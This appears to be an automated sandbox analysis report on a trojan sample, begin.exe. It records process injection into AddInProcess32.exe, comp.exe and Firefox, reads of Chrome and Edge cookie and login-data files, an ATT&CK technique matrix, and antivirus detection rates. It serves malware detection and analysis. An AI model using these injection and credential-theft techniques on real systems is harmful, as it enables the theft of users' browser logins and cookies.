Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtCreateMutant: Direct from: 0x777535CC	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtWriteVirtualMemory: Direct from: 0x77752E3C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtMapViewOfSection: Direct from: 0x77752D1C	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtResumeThread: Direct from: 0x777536AC	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtReadFile: Direct from: 0x77752ADC	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtQuerySystemInformation: Direct from: 0x77752DFC	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtDelayExecution: Direct from: 0x77752DDC	Jump to behavior
Source: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe	NtAllocateVirtualMemory: Direct from: 0x77752BFC	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: NULL target: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: NULL target: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: NULL target: C:\Program Files (x86)\uXYLebzMvjIrFwxFwwJmmMKFsNsxjeRurHXcybKLYavcJStbrel\fMCYiMEFQZmFBs7vgZ5.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\begin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\begin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 869008	Jump to behavior

Source: fMCYiMEFQZmFBs7vgZ5.exe, 0000000D.00000002.2476377272.0000000001680000.00000002.00000001.00040000.00000000.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000D.00000000.1901608584.0000000001680000.00000002.00000001.00040000.00000000.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000F.00000000.2057492803.0000000001020000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: XProgram Manager
Source: fMCYiMEFQZmFBs7vgZ5.exe, 0000000D.00000002.2476377272.0000000001680000.00000002.00000001.00040000.00000000.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000D.00000000.1901608584.0000000001680000.00000002.00000001.00040000.00000000.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000F.00000000.2057492803.0000000001020000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fMCYiMEFQZmFBs7vgZ5.exe, 0000000D.00000002.2476377272.0000000001680000.00000002.00000001.00040000.00000000.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000D.00000000.1901608584.0000000001680000.00000002.00000001.00040000.00000000.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000F.00000000.2057492803.0000000001020000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: fMCYiMEFQZmFBs7vgZ5.exe, 0000000D.00000002.2476377272.0000000001680000.00000002.00000001.00040000.00000000.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000D.00000000.1901608584.0000000001680000.00000002.00000001.00040000.00000000.sdmp, fMCYiMEFQZmFBs7vgZ5.exe, 0000000F.00000000.2057492803.0000000001020000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	Windows Management Instrumentation	1 Valid Accounts	1 Valid Accounts	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	1 Valid Accounts	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	612 Process Injection	1 Access Token Manipulation	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 DLL Side-Loading	141 Virtualization/Sandbox Evasion	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	612 Process Injection	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Deobfuscate/Decode Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Abuse Elevation Control Mechanism	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	3 Obfuscated Files or Information	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 DLL Side-Loading	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Source	Detection	Scanner	Label	Link
begin.exe	69%	Virustotal		Browse
begin.exe	53%	ReversingLabs	Win32.Trojan.CrypterX
begin.exe	100%	Avira	TR/Kryptik.guogq